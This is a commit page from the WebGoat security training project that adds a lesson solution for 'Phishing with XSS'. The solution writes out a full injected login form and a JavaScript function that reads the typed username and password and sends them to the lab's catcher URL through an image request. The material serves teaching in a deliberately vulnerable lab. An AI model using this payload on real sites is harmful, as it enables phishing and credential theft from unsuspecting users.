* Hints added
* Solutions added * Bugfixes * Introduction added (including how to start with webgoat and useful tools) * New lesson: Password strength * New lessons: Multi Level Login * Not yet working new lesson: Session fixation (inital release) git-svn-id: http://webgoat.googlecode.com/svn/trunk@301 4033779f-a91e-0410-96ef-6bf7bf53c507
This commit is contained in:
wirth.marcel
@ -0,0 +1,67 @@
|
||||
<html>
|
||||
<head>
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
|
||||
<title>Solution Lab Block Stored XSS</title>
|
||||
<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
|
||||
</head>
|
||||
<body>
|
||||
<p><b>Lesson Plan Title:</b> Phishing with XSS</p>
|
||||
|
||||
<p><b>Concept / Topic To Teach:</b><br/>
|
||||
It is always a good practice to validate all input on the
|
||||
server side. XSS can occur when unvalidated user input is used
|
||||
in an HTTP response. With the help of XSS you can do a Phishing
|
||||
Attack and add content to a page which looks official. It is very
|
||||
hard for a victim to determinate that the content is malicious.
|
||||
</p>
|
||||
|
||||
<p><b>General Goal(s):</b><br/>
|
||||
The user should be able to add a form asking for username
|
||||
and password. On submit the input should be sent to
|
||||
http://localhost/WebGoat/catcher?PROPERTY=yes&user=catchedUserName&password=catchedPasswordName
|
||||
</p>
|
||||
|
||||
<b>Solution:</b><br/>
|
||||
With XSS it is possible to add further elements to an exsisting Page.
|
||||
This solution consists of two parts you have to combine:
|
||||
<ul>
|
||||
<li>A form the victim has to fill in</li>
|
||||
<li>A script which reads the form and sends the gathered information to the attacker</li>
|
||||
</ul>
|
||||
A Form whith username and password could look like this:<br/>
|
||||
<p>
|
||||
<form><br><br><HR><H3>This feature requires account login:</H3
|
||||
><br><br>Enter Username:<br><input type="text" id="user"
|
||||
name="user"><br>Enter Password:<br><input type="password"
|
||||
name = "pass"><br></form><br><br><HR>
|
||||
<br/><br/>Search for this term and you will see that a form is added to the page.
|
||||
</p>
|
||||
Now you need a script:
|
||||
<p>
|
||||
<script>function hack(){ alert("Had this been a real attack... Your credentials were just stolen."
|
||||
User Name = " + document.forms[0].user.value + "Password = " + document.forms[0].pass.value);
|
||||
XSSImage=new Image; XSSImage.src="http://localhost/WebGoat/catcher?PROPERTY=yes&user="+
|
||||
document.forms[0].user.value + "&password=" + document.forms[0].pass.value + "";}
|
||||
</script>
|
||||
</p>
|
||||
<p>
|
||||
This script will read the input from the form and send it to the catcher of WebGoat.<br/><br/>
|
||||
The last step is to put things together. Add a Button to the form which
|
||||
calls the script. You can reach this wicht the onclick="myFunction" handler.
|
||||
<p>
|
||||
The final String looks like this:<br/>
|
||||
<script>function hack(){ alert("Had this been a real attack... Your credentials were just stolen.
|
||||
User Name = " + document.forms[0].user.value + "Password = " + document.forms[0].pass.value);
|
||||
XSSImage=new Image; XSSImage.src="http://localhost/WebGoat/catcher?PROPERTY=yes&user="+
|
||||
document.forms[0].user.value + "&password=" + document.forms[0].pass.value + "";}
|
||||
</script><form><br><br><HR><H3>This feature requires account login:</H3
|
||||
><br><br>Enter Username:<br><input type="text" id="user"
|
||||
name="user"><br>Enter Password:<br><input type="password"
|
||||
name = "pass"><br><input type="submit" name="login"
|
||||
value="login" onclick="hack()"></form><br><br><HR>
|
||||
</p>
|
||||
Search for this String and you will see a form asking for your username and password.
|
||||
Fill in these fields and click on the Login Button.
|
||||
</body>
|
||||
</html>
|
||||
|
||||
Reference in New Issue
Block a user